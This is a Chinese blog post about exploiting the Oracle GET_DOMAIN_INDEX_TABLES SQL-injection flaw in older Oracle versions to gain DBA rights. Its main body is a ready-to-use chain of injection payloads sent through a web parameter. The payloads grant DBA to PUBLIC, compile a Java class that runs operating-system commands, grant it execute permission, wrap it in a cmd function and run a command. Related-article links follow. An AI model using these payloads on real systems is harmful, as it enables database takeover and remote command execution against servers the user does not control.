oracle get line,继Oracle提权漏洞的实际操作--GET_DOMAIN_INDEX_TABLES函数注入漏洞

最新推荐文章于 2024-05-17 08:53:31 发布
最新推荐文章于 2024-05-17 08:53:31 发布
阅读量268 收藏
点赞数

oracle get line

GET_DOMAIN_INDEX_TABLES函数注入漏洞

影响版本:Oracle 8.1.7.4, 9.2.0.1 - 9.2.0.7, 10.1.0.2 - 10.1.0.4, 10.2.0.1-10.2.0.2

漏洞的成因是该函数的参数存在注入,而该函数的所有者是sys,所以通过注入就可以执行任意sql,该函数的执行权限为public,所以只要遇到一个oracle的注入点并且存在这个漏洞的,基本上都可以提升到最高权限。

权限提升http://www.iswin.org/oracle.jsp?name=' and (SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS _OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACT;BEGIN EXECUTE IMMEDIATE ''''grant dba to public'''';END;'';END;--','SYS',0,'1',0)) is not null--

权限提升之后就可以做很多事了,因为Oracle可以执行JAVA代码,所以在提升权限后具体怎么操作,就看各自的JAVA水平了。

这里给出几种常见的利用方式。

命令执行

创建JAVA代码

http://www.iswin.org/oracle.jsp?name=' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT" .PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named "Command" as import java.io.*;public class Command{public static String exec(String cmd) throws Exception{String sb="";BufferedInputStream in = new BufferedInputStream(Runtime.getRuntime().exec(cmd).getInputStream());BufferedReader inBr = new BufferedReader(new InputStreamReader(in));String lineStr;while ((lineStr = inBr.readLine()) != null)sb+=lineStr+"";inBr.close();in.close();return sb;}}'''';END;'';END;--','SYS',0,'1',0) from dual) is not null--

例子:select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT" .PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named "Command" as import java.io.*;public class Command{public static String exec(String cmd) throws Exception{String sb="";BufferedInputStream in = new BufferedInputStream(Runtime.getRuntime().exec(cmd).getInputStream());BufferedReader inBr = new BufferedReader(new InputStreamReader(in));String lineStr;while ((lineStr = inBr.readLine()) != null)sb+=lineStr+"";inBr.close();in.close();return sb;}}'''';END;'';END;--','SYS',0,'1',0) from dual

赋予JAVA执行权限

http://www.iswin.org/oracle.jsp?name=' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual) is not null--

例子:select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual

f50dca588ef7a714f289d128c15cae04.png

创建函数

http://www.iswin.org/oracle.jsp?name=' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT" .PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function cmd(p_cmd in varchar2) return varchar2 as language java name ''''''''Command.exec(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual) is not null--

例子:select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT" .PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function cmd(p_cmd in varchar2) return varchar2 as language java name ''''''''Command.exec(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual

32691c783f242ee2a40bc134e6419506.png

赋予函数执行权限

http://www.iswin.org/oracle.jsp?name=' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT" .PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on cmd to public'''';END;'';END;--','SYS',0,'1',0) from dual) is not null--

例子:select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT" .PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on cmd to public'''';END;'';END;--','SYS',0,'1',0) from dual

执行命令

http://www.iswin.org/oracle.jsp?name=' and (select sys.cmd('cmd.exe /c whoami') from dual ) is not null--

例子:select sys.cmd('whoami') from dual

倔骆驼
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
数据库手动注入提权Oracle、PostgreSQL、联合查询、布尔注入、报错注入、延时注入、堆查询注入、带外注入、写WebShell)
墨痕诉清风的博客
07-24 576
Oracle类型判断PostgreSQL类型判断(特有的语法)
生产漏洞修复总结
duanbiren123的博客
07-08 5336
1、 修复ssh相关漏洞 漏洞列表: OpenSSH auth_password函数拒绝服务漏洞(CVE-2016-6515) OpenSSH do_setup_env函数权限提升漏洞(CVE-2015-8325) OpenSSH glob表达式拒绝服务漏洞(CVE-2010-4755) OpenSSH J-PAKE授权问题漏洞(CVE-2010-4478) Openssh MaxAu...
oracle用户获取datameta权限,Oracle数据库提权(低权限提升至dba)
weixin_39850062的博客
04-11 755
0x01 Oracle存储过程”缺陷”在 Oracle 的存储过程中,有一个有趣的特点:运行权限。运行权限分为两种,definer和 invoker。definer 为函数创建者的权限,而 invoker 则是当前调用函数的用户。运行权限在函数创建时就已经被钦定了,默认为 definer。说白了,如果我们用低权限用户去运行DBA权限用户创建的存储过程,我们在调用时就可以额访问DBA资源,使用DB...
Oracle数据库漏洞提权防护:守护企业数据安全的指南
2401_84968371的博客
05-17 412
通过本文的详细讲解和实例演示,我们可以看到Oracle数据库漏洞的预防及其提权防护策略在保障企业数据安全方面的重要性。合理配置Oracle数据库的安全策略,可以降低数据库被攻击的风险。随着技术的不断进步,我们有理由相信,Oracle数据库的安全防护技术将在未来发挥更大的作用,为企业和组织提供更加高效和便捷的数据安全保障。自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
Oracle数据库提权(dba权限执行系统命令)
bylfsj的博客
10-12 1277
0x01 Oracle存储过程”缺陷” 在 Oracle 的存储过程中,有一个有趣的特点:运行权限。运行权限分为两种,definer 和 invoker。   definer 为函数创建者的权限,而 invoker 则是当前调用函数的用户。运行权限在函数创建时就已经被钦定了,默认为 definer。     说白了,如果我们用低权限用户去运行DBA权限用...
Linux-4.4-x86_64 内核配置选项简介
huihuiwith的博客
06-29 2764
Linux-4.4-x86_64 内核配置选项简介作者:金步国64-bit kernelCONFIG_64BIT编译64位内核.本文仅讲述x86_64(AMD64)平台的内核编译,所以这个是必选项.General setup常规设置Cross-compiler tool prefixCONFIG_CROSS_COMPILE交叉编译工具前缀(比如"arm-linux-"相当于使用"make CROS...
java dbaResult_数据库—从注入提权的全家桶套餐
weixin_29157493的博客
03-04 215
前言偶然看到了最新的数据库流行度排名,发现在前5名的关系型数据库中,日常渗透测试见到最多的便是MySQL,排名第一的Oracle可能因为企业版高昂的价格限制了用户群众,在实际中相对于MySQL遇到的偏少,作为完全免费开源的PostgreSQL,虽然也占据了榜单Top 4,但目前在国内碰到的几率也很小。 所以这次先重点研究一下Oracle与PostgreSQL这两种数据库从手注到提权的不同方式,避免...
Linux-4.x_x _64 内核配置选项简介
u013165704的博客
06-02 7724
Gentoo LinuxGentoo内核(gentoo-sources)特有的选项Gentoo Linux supportCONFIG_GENTOO_LINUX选"Y"后,将会自动选中那些在Gentoo环境中必须开启的内核选项,以避免用户遗漏某些必要的选项,减轻一些用户配置内核的难度.建议选"Y".Linux dynamic and persistent device naming (usersp...
OracleOracle错误编码大全
兮动人
12-30 2696
OracleOracle错误编码大全
oracle中的三个系统文件,我的oracle笔记三(系统函数和系统包使用方面)
weixin_39907922的博客
04-05 166
1.十进制和十六进制转换(oracle 8i以后)select to_char(125,'XXXXX') from dual-----------7Dselect to_char(125,'xxxxx') from dual-----------7dselect to_number('7D','XXXXX') from dual-----------1252. ORACLE产生随机函数DBMS_R...
oracle-function--api.zip_oracle_oracle API_oracle sql api
09-24
本资料“oracle-function--api.zip”包含了Oracle数据库中的一些核心API和SQL函数,特别是针对字符串、日期和数字类型的处理,对于Oracle开发人员来说极具参考价值。 一、Oracle SQL API Oracle SQL API是Oracle...
Oracle11gR2 (p13390677_112040_Linux-x86-64_4of7.zip)
07-15
Oracle11gR2 Linux版本linux_x86_64_oracle11.2.0.4 文件分割成7个压缩包,必须集齐7个文件后才能一起解压一起使用: p13390677_112040_Linux-x86-64_7of7.zip下载地址: ... p13390677_112040_Linux-x86-64_6of7.zip...
Oracle--biancheng.rar_oracle_oracle cursors _sage _存储过程
09-24
设有学生表student(学号sno, 姓名sname, 年龄 sage,系别dept)、课程表Course(课程号cno,课程名称cname)和选课表sc(学号sno,课程号cno,成绩grade),用Oracle PL/SQL语言设计一个名为pkg_student程序包,要求: ...
oracle-database-programming.rar_oracle_oracle函数
09-22
Oracle数据库中,函数可以分为几大类,包括内置函数、数学函数、字符串函数、日期时间函数、转换函数、系统信息函数、聚合函数以及自定义函数等。以下将对这些函数进行详细讲解: 1. **内置函数**:这是Oracle...
Oracle-SQL-function.rar_oracle_oracle ppt
09-24
- 在Oracle SQL中,函数是用来处理或转换单个值的预定义操作。 2. **数值函数** - `ABS()`: 计算绝对值,例如`ABS(-5)`返回5。 - `ROUND()`: 四舍五入到指定的小数位数。 - `CEIL()`: 向上取整,返回大于或等于...
2024年全球资产管理报告:AI与下一轮转型浪潮-BCG.pdf
08-02
2024年全球资产管理报告:AI与下一轮转型浪潮-BCG.pdf
电子书:探索人工智能在 OSINT 中的作用中文版.pdf
08-02
电子书:探索人工智能在 OSINT 中的作用中文版.pdf
基于Springboot的线上历史馆藏系统(有报告) Javaee项目,springboot项目
最新发布
08-02
资源详情:https://blog.csdn.net/2302_78191516/article/details/140881816
Oracle 1Z0-147 PL/SQL 函数调用实践: CALC_PLAYER_AVG 示例
Oracle 1Z0-147考试是针对Oracle 9i中的程序设计与PL/SQL的知识点,特别是在这个特定版本(Ver:10-27-05)中,题目主要聚焦于函数的使用和调用。本部分提供了一个名为`CALC_PLAYER_AVG`的示例函数,该函数接受一个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值